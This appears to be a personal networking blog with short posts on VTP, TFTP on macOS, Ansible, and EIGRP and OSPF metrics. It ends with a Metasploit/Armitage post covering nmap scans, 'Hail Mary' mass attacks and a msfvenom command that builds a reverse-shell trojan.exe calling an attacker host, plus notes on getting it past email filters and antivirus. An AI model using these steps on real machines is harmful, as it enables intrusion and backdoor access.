two vtp server in a same domain

When vtp is configured, the configured vlans are stored in vlan.dat file, not in running-configure or startup-configure file.

It is common that two vtp server in a same domain is running, this is for vlans database redudant. When there is a new change generated in one VTP server, the update will be sent out inside the vtp domain, the other vtp server in the same domain will update its vlan.dat also.

Be careful to setup the same vtp version on both servers, otherwise the server with higher version will become master.

When replacing a switch that is acting as VTP server in the network, the best way is to change the new switch into client mode first, in order to get vlans updated from other vtp servers, then change the new switch back to server mode.


Configure OS x as tftp server and download from vrf enabled 6800 chassis

Below is the steps that I used to download files from vrf enabled 6800 chassis to my mac laptop:

1, Enable tftp server in OS x:

sudo launchctl load -F /System/Library/LaunchDaemons/tftp.plist
sudo launchctl start

By default use private/tftpboot/ filefolder for tftp download and upload:

sudo chmod 777 /private/tftpboot
sudo chmod 777 /private/tftpboot/*

2, setup tftp route in 6800

I want to download/upload from/to mgmt port, mgmt port belongs to a separated management vrf. In order to make tftp server IP routed correctly, we need add the following configuration into the chassis:

cat6k#ip tftp source-interface mgmt0

3, Now it is ready for tftp download/upload to OS x from/to vrf enabled Chassis.

cat6k#copy running-config tftp://172.27.x.x

Address or name of remote host [172.27.x.x]?

Destination filename [xxx-confg]? running-config


85918 bytes copied in 1.084 secs (79260 bytes/sec)

Install ansible in mac os

Ansible is mainly used for automize Linux/windows servers provisioning and operation, however from version 2.1 there is support module for network related devices.

In order to test it I have first install ansible in my mac:

There are several ways to install ansible, but the mostly common used on mac is homebrew an pip. Here is the comparision of both installation ways:

"pip is a packager for the python world – you should only ever be able to install python-things with it; homebrew is a package manager targetted at OSX; it doesn’t impose any restrictions onto what software you can install with it – since python is a subset of software.

installing things with brew will install them into /usr/local/;

installing things with pip will fetch packages from the Python Package Index, and it will install them in a place where your python interpreter will find them: either into your home directory (e.g. ~/.local/lib/python2.7/site-packages/) or in some global search-path of your python interpreter (e.g. /usr/local/lib/python2.7/dist-packages/)”

We will just explore the way to install ansible with homebrew:

1, install Xcode (C compiler) in order to use python
xcode-select –install

2, Install python using homebrew

brew install python


brew install python3

Actually, step 1 and 2 can be skipped because all new Mac OS X has python 2.7 installed already.

3, brew install ansible

After the installation we can find ansible is installed under /usr/local/bin/

mac-c02t6npagtfj:bin grayin$ ls ansible*

ansible ansible-doc ansible-pull

ansible-config ansible-galaxy ansible-vault

ansible-connection ansible-inventory

ansible-console ansible-playbook

notes: do “brew update” first before the installation to avoid any unexpected errors

How to influence EIGRP metrics to affect route selection

EIGRP updates contain five metrics: minimum bandwidth, delay, load, reliability, and maximum transmission unit (MTU). Of these five metrics, by default, only minimum bandwidth and delay are used to compute best path. Unlike most metrics, minimum bandwidth is set to the minimum bandwidth of the entire path, and it does not reflect how many hops or low bandwidth links are in the path. Delay is a cumulative value which increases by the delay value of each segment in the path.

Therefore we can change delay on interface to affect route selection, but this method can only be used when need to influence route selection learned via EIGRP neighbor on that interface.

Another more sophisticated way is to use offset-list, the metric of the route on the router can be modified using an offset-list on the neighbor router. Offset-list will insert the value to affect RD and FD advertised towards the peer router.

OSPF loadbalance

4 is the default number of routes that OSPF will include in routing table if more than 4 equal cost routes exist for the same subnet. However, OSPF can include up to 16  equal cost routes in the routing table and  perform load balancing amongst them. In order to configure this feature, you need to use the  OSPF subcommand maximum-paths, i.e. maximum-paths 16.

OSPF uses Link cost as a metric not hop count.

etwork Type Cost
FDDI/Fast Ethernet 1
Token Ring (16Mbps) 6
Ethernet 10
E1 48
T1 64
64 kb/s 1562
56 kb/s 1785

Maximum paths EIGRP defaults to 4 paths for load balancing but the maximum that can be set is 16.

When multiple routes are installed in the routing table, Cisco switch will depends on CEF to pick the route. By default CEF will use src-dst IP pair to select route path, however there might be CEF polarization problem.


Metasploit & Armitage

Armitage is a GUI based Metasploit, it save your time to remember all cli commands in metasploit and visualize scanning results.  Both of the tools are available in kalilinux. If you can use one of them, then you can use the other automaticly.

I tried both, below is the guide to discover all online machine in a subnet by using armigate:

1,  Hosts tab-> clear database

This is to prepare a clean environment for new discovery

2,  Hosts->nmap scan -> quick scan (detect OS) -> input subnet IP for scaning

This will take a couple of minutes to complete depending on how big the subnet is. This step can be finished by using pure nmap command under cli.

After this step, you should be able to see the operation system running on each machine, however it can not recognize windows 10.  By using nmap we would check the way of detecting OS. In short nmap will scan some special ports of the victim and see if those ports are open, especially 139 and 445. If these ports are open, nmap can very likly use them to detecting OS of the victim, more details here.

“One of Nmap’s best-known features is remote OS detection using TCP/IP stack fingerprinting. Nmap sends a series of TCP and UDP packets to the remote host and examines practically every bit in the responses. After performing dozens of tests such as TCP ISN sampling, TCP options support and ordering, IP ID sampling, and the initial window size check, Nmap compares the results to itsnmap-os-db database of more than 2,600 known OS fingerprints and prints out the OS details if there is a match. Each fingerprint includes a freeform textual description of the OS, and a classification which provides the vendor name (e.g. Sun), underlying OS (e.g. Solaris), OS generation (e.g. 10), and device type (general purpose, router, switch, game console, etc). Most fingerprints also have a Common Platform Enumeration (CPE) representation, like cpe:/o:linux:linux_kernel:2.6.”

When trying to scan window 10 machine, we can see the message something like ” all ports are filtered”. Below is an example of scanning windows 10 machine:

root@kali:/# nmap -O

Starting Nmap 7.40 ( ) at 2017-10-05 04:58 EDT
Nmap scan report for juhao.lan (
Host is up (0.014s latency).
All 1000 scanned ports on juhao.lan ( are filtered
MAC Address: AC:D1:B8:E4:3F:E7 (Hon Hai Precision Ind.)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 24.20 seconds

3, When scanning is completed, all online machine will be listed as icons in the workspace.  we can do attacks -> find attacks to find all possible attacks towards each machines. we can also do attacks -> Hail Mary  to launch massive attacks towards target machines.

Unfortunately I tried Hail Mary towards my windows 7 and window 8.1, no one get compromised. Again it looks like all those attacks in metasploit are already well-known, and can not be a serious threat in the real world.

In order to implement a successful attack, we can also utilize payload in metasploit. I tested that classic payload windows/meterpreter/reverse_tcp

Here is the guide regarding how to generate a vicious .exe code, in short:

# msfvenom -p windows/meterpreter/reverse_tcp  –platform windows-a x86 -f exe LHOST=“attacker ip” LPORT=4444 -o /root/Desktop/trojan.exe

Msfvenom is a tool used to generated vicious code for metasploit payload. The code need to be transfered to target machines and runned there in order to create a backdoor towards attackers machine.

The real challenge is actually to send this .exe code to victim machine. I am using my own machine for test but can not even load the code into my machine. I tried by sending myself email, but the email attachment is blocked because google has detected malicious malware in the attachment. I tried to copy the file into USB, but as long as I insert USB into my test machine the malware is removed by windows defender. The author recommended to use some encoder, for example Veil-Evasion to disguise .exe file, need find time to try this.